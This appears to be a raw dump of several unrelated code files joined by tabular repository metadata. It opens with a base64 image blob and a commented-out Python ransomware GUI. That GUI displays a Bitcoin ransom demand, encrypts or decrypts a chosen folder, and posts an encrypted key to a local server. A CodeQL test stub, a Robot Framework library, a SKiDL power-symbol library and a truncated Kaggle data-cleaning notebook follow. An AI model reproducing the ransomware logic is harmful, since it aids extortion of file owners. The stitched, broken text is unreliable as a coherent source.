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'
# layout = [[sg.Image(size=(900,300),data=data)],
# [sg.Text("Your files have been encrypted. ")],
# [sg.Text("Pay 1000BTC to 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy to receive decryption key.")],
# [sg.T("")], [sg.Text("Choose a folder: "), sg.Input(key="-DIR-" ,change_submits=True), sg.FolderBrowse(key="-DIR-")],[sg.Button("Submit")],
# [sg.Text("Enter Encryption Key...")],
# [sg.Input(key='-EINPUT-')],
# [sg.Text("Enter Decryption Key...")],
# [sg.Input(key='-DINPUT-')],
# [sg.Text(size=(40,1), key='-OUTPUT-')],
# [sg.Button('Decrypt Files'),sg.Button('Encrypt'), sg.Button('Quit')]
# #[sg.Button('Send a Post')]
# ]
# # Create the window
# window = sg.Window('Ran Some Where', layout, enable_close_attempted_event=True, resizable=True)
# # Display and interact with the Window using an Event Loop
# while True:
# event, values = window.read()
# # See if user wants to quit or window was closed
# # if event == sg.WINDOW_CLOSED or event == 'Quit':
# # break
# # Output a message to the window
# if event == 'Decrypt Files':
# window['-OUTPUT-'].update('Decrypting files with key: ' + values['-DINPUT-'] + ". . .")
# decrypt_data(values['-DINPUT-'], values['-DIR-'])
# # decrypt_data(values['-DINPUT-'], './test/')
# # fast_decrypt('./test/test.txt.pyran', values['-DINPUT-'])
# elif event == 'Encrypt':
# window['-OUTPUT-'].update('Encrypting files with key: ' + values['-EINPUT-'] + ". . .")
# encrypt_data(values['-EINPUT-'], values['-DIR-'])
# elif event == 'Send a Post':
# url = 'http://localhost:8080'
# key = generate_encryption_key(25)
# encrypted_key = pgp_encrypt(key)
# b64encoded_encrypted_key = base64.b64encode(encrypted_key.encode('ascii'))
# print(encrypted_key.encode('utf-8'))
# print(str(b64encoded_encrypted_key))
# obj = {'this': str(b64encoded_encrypted_key)}
# x = requests.post(url, data = obj)
# if (event == sg.WINDOW_CLOSE_ATTEMPTED_EVENT or event == 'Exit') and sg.popup_yes_no('Ah ah ah, leaving so soon? Stick around!') == 'Yes':
# continue
# # Finish up by removing from the screen
# window.close()
| 353.76 | 60,932 | 0.934843 | 2,703 | 70,752 | 24.436922 | 0.780984 | 0.000545 | 0.000848 | 0.000727 | 0.008963 | 0.008417 | 0.006268 | 0.005511 | 0.005511 | 0.005511 | 0 | 0.136348 | 0.024452 | 70,752 | 199 | 60,933 | 355.537688 | 0.820637 | 0.905119 | 0 | 0.147541 | 0 | 0 | 0.542922 | 0.499398 | 0 | 1 | 0 | 0 | 0 | 1 | 0.065574 | false | 0.065574 | 0.081967 | 0 | 0.163934 | 0.040984 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
2a7c5e58847ac4f6803515d4384ac122034e1eb1 | 33 | py | Python | python/ql/test/query-tests/Security/lib/traceback.py | vadi2/codeql | a806a4f08696d241ab295a286999251b56a6860c | [
"MIT"
] | 4,036 | 2020-04-29T00:09:57.000Z | 2022-03-31T14:16:38.000Z | python/ql/test/query-tests/Security/lib/traceback.py | vadi2/codeql | a806a4f08696d241ab295a286999251b56a6860c | [
"MIT"
] | 2,970 | 2020-04-28T17:24:18.000Z | 2022-03-31T22:40:46.000Z | python/ql/test/query-tests/Security/lib/traceback.py | ScriptBox99/github-codeql | 2ecf0d3264db8fb4904b2056964da469372a235c | [
"MIT"
] | 794 | 2020-04-29T00:28:25.000Z | 2022-03-30T08:21:46.000Z | def format_exc():
return None | 16.5 | 17 | 0.69697 | 5 | 33 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212121 | 33 | 2 | 18 | 16.5 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
2a7f0a194dea8f1b27d8f9cc4ab702817872cef7 | 167 | py | Python | tests/atest/library_from_resource/test_data/MyStuff.py | bhirsz/robotframework-sherlock | 53edb5f15517d8fbdf05eb0c84eb34332dcbf308 | [
"Apache-2.0"
] | 2 | 2022-03-17T07:55:37.000Z | 2022-03-17T08:18:44.000Z | tests/atest/library_from_resource/test_data/MyStuff.py | bhirsz/robotframework-sherlock | 53edb5f15517d8fbdf05eb0c84eb34332dcbf308 | [
"Apache-2.0"
] | 16 | 2022-03-09T09:29:34.000Z | 2022-03-14T20:29:38.000Z | tests/atest/library_from_resource/test_data/MyStuff.py | bhirsz/robotframework-sherlock | 53edb5f15517d8fbdf05eb0c84eb34332dcbf308 | [
"Apache-2.0"
] | null | null | null | import time
class MyStuff:
def my_keyword(self):
time.sleep(2)
def not_used(self):
pass
def third_keyword(self):
time.sleep(1)
| 12.846154 | 28 | 0.586826 | 23 | 167 | 4.130435 | 0.652174 | 0.231579 | 0.315789 | 0.421053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017544 | 0.317365 | 167 | 12 | 29 | 13.916667 | 0.815789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0.125 | 0.125 | 0 | 0.625 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
aa60ac6bf1df6214e1fb7c01bc3250dc1223faa3 | 8,114 | py | Python | skidl/libs/power_sklib.py | arjenroodselaar/skidl | 0bf801bd3b74e6ef94bd9aa1b68eef756b568276 | [
"MIT"
] | 700 | 2016-08-16T21:12:50.000Z | 2021-10-10T02:15:18.000Z | skidl/libs/power_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 118 | 2016-08-16T20:51:05.000Z | 2021-10-10T08:07:18.000Z | skidl/libs/power_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 94 | 2016-08-25T14:02:28.000Z | 2021-09-12T05:17:08.000Z | from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
SKIDL_lib_version = '0.0.1'
power = SchLib(tool=SKIDL).add_parts(*[
Part(name='+12C',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+12L',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+12LF',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+12P',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+12V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+12VA',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+15V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V0',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V1',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V2',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V35',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V5',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V8',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+24V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+28V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+2V5',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+2V8',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+3.3VA',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+3.3VADC',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+3.3VDAC',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+3.3VP',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+36V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+3V3',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['+3.3V']),
Part(name='+48V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5C',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5F',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5P',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5VA',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5VD',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5VL',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5VP',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+6V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+8V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+9V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+9VA',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+BATT',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='-10V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-10V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-12V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-12V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-12VA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-12VA',func=Pin.PWRIN,do_erc=True)]),
Part(name='-15V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-15V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-24V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-24V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-36V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-36V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-48V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-48V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-5V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-5V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-5VA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-5VA',func=Pin.PWRIN,do_erc=True)]),
Part(name='-6V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-6V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-8V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-8V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-9VA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-9VA',func=Pin.PWRIN,do_erc=True)]),
Part(name='AC',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='AC',func=Pin.PWRIN,do_erc=True)]),
Part(name='~Earth',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='~Earth_Clean',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='~Earth_Protective',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='GND',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='GNDA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GNDA',func=Pin.PWRIN,do_erc=True)]),
Part(name='GNDD',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GNDD',func=Pin.PWRIN,do_erc=True)]),
Part(name='GNDPWR',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GNDPWR',func=Pin.PWRIN,do_erc=True)]),
Part(name='GNDREF',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GNDREF',func=Pin.PWRIN,do_erc=True)]),
Part(name='HT',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='PWR_FLAG',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='VAA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VAA',func=Pin.PWRIN,do_erc=True)]),
Part(name='VCC',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VCC',func=Pin.PWRIN,do_erc=True)]),
Part(name='VCOM',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VCOM',func=Pin.PWRIN,do_erc=True)]),
Part(name='VDD',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VDD',func=Pin.PWRIN,do_erc=True)]),
Part(name='VDDA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VDDA',func=Pin.PWRIN,do_erc=True)]),
Part(name='VEE',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VEE',func=Pin.PWRIN,do_erc=True)]),
Part(name='VMEM',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VMEM',func=Pin.PWRIN,do_erc=True)]),
Part(name='VPP',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VPP',func=Pin.PWRIN,do_erc=True)]),
Part(name='VSS',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VSS',func=Pin.PWRIN,do_erc=True)]),
Part(name='VSSA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VSSA',func=Pin.PWRIN,do_erc=True)])])
| 78.019231 | 122 | 0.653439 | 1,318 | 8,114 | 3.901366 | 0.069044 | 0.095294 | 0.171529 | 0.285881 | 0.929016 | 0.929016 | 0.92396 | 0.915403 | 0.796188 | 0.611435 | 0 | 0.022612 | 0.127927 | 8,114 | 103 | 123 | 78.776699 | 0.70407 | 0 | 0 | 0 | 0 | 0 | 0.103771 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009901 | 0 | 0.009901 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aa69b37f61d65ea9b02e0cb0d3d9816c25770cff | 37 | py | Python | code/CM4_portee1.py | christophesaintjean/IntroProgS1_2020 | 99555d1e3681d88ee023592a16caecdec6f7c0b4 | [
"CC0-1.0"
] | null | null | null | code/CM4_portee1.py | christophesaintjean/IntroProgS1_2020 | 99555d1e3681d88ee023592a16caecdec6f7c0b4 | [
"CC0-1.0"
] | null | null | null | code/CM4_portee1.py | christophesaintjean/IntroProgS1_2020 | 99555d1e3681d88ee023592a16caecdec6f7c0b4 | [
"CC0-1.0"
] | null | null | null | def f():
a = 2 * x
x = 4
f() | 7.4 | 13 | 0.27027 | 8 | 37 | 1.25 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0.513514 | 37 | 5 | 14 | 7.4 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.25 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aaabd28ef97951a4cf330fedd0f2de5a14876cba | 172,122 | py | Python | Data_preparation/DataCleaner.py | abishekpadaki/recommendation_system_kaggle | 30661ffd66bd1eadf2b3e4cd4144ca60588e1776 | [
"MIT"
] | null | null | null | Data_preparation/DataCleaner.py | abishekpadaki/recommendation_system_kaggle | 30661ffd66bd1eadf2b3e4cd4144ca60588e1776 | [
"MIT"
] | null | null | null | Data_preparation/DataCleaner.py | abishekpadaki/recommendation_system_kaggle | 30661ffd66bd1eadf2b3e4cd4144ca60588e1776 | [
"MIT"
] | null | null | null | {
"cells": [
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"import pandas as pd\n",
"import numpy as np\n",
"import matplotlib.pyplot as plt\n",
"%matplotlib inline"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {
"scrolled": true
},
"outputs": [],
"source": [
"#Add Language and Id to kernel\n",
"lang = pd.read_csv('../Datasets/KernelLanguages.csv')\n",
"kern = pd.read_csv('../Datasets/KernelVersions.csv')\n",
"kernel = pd.read_csv('../Datasets/Kernels.csv')\n",
"kern = kern[['KernelId','KernelLanguageId']]\n",
"kern.drop_duplicates(subset='KernelId',keep='last',inplace=True)\n",
"lang = lang[['Id','DisplayName']]\n",
"lang.columns = ['KernelLanguageId','DisplayName']\n",
"out = pd.merge(kern,lang,on = 'KernelLanguageId')\n",
"out = out.sort_values('KernelId')\n",
"out.columns = ['Id','LanguageId','LanguageName']\n",
"df = kernel.merge(out,on = 'Id',how = 'inner')\n",
"df = df.drop(['CreationDate','EvaluationDate','MadePublicDate','MedalAwardDate','LanguageId'],axis = 1)"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [],
"source": [
"# Fixing vote with 0 views\n",
"temp = df[['TotalViews','TotalVotes']].copy()\n",
"temp = temp[(temp.TotalVotes > 0) & (temp.TotalViews == 0)]\n",
"df.loc[temp.index,'TotalVotes'] = 0"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [
{
"name": "stderr",
"output_type": "stream",
"text": [
"/usr/local/lib/python2.7/dist-packages/ipykernel_launcher.py:1: SettingWithCopyWarning: \n",
"A value is trying to be set on a copy of a slice from a DataFrame\n",
"\n",
"See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy\n",
" \"\"\"Entry point for launching an IPython kernel.\n",
"/usr/local/lib/python2.7/dist-packages/ipykernel_launcher.py:2: SettingWithCopyWarning: \n",
"A value is trying to be set on a copy of a slice from a DataFrame\n",
"\n",
"See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy\n",
" \n"
]
},
{
"data": {
"text/html": [
"<div>\n",
"<style scoped>\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"</style>\n",
"<table border=\"1\" class=\"dataframe\">\n",
" <thead>\n",
" <tr style=\"text-align: right;\">\n",
" <th></th>\n",
" <th>Id</th>\n",
" <th>AuthorUserId</th>\n",
" <th>CurrentKernelVersionId</th>\n",
" <th>ForkParentKernelVersionId</th>\n",
" <th>ForumTopicId</th>\n",
" <th>FirstKernelVersionId</th>\n",
" <th>IsProjectLanguageTemplate</th>\n",
" <th>CurrentUrlSlug</th>\n",
" <th>Medal</th>\n",
" <th>TotalViews</th>\n",
" <th>TotalComments</th>\n",
" <th>TotalVotes</th>\n",
" <th>LanguageName</th>\n",
" </tr>\n",
" </thead>\n",
" <tbody>\n",
" <tr>\n",
" <th>0</th>\n",
" <td>1</td>\n",
" <td>2505</td>\n",
" <td>205.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>1.0</td>\n",
" <td>False</td>\n",
" <td>hello</td>\n",
" <td>NaN</td>\n",
" <td>24</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>1</th>\n",
" <td>2</td>\n",
" <td>3716</td>\n",
" <td>1748.0</td>\n",
" <td>NaN</td>\n",
" <td>26670.0</td>\n",
" <td>2.0</td>\n",
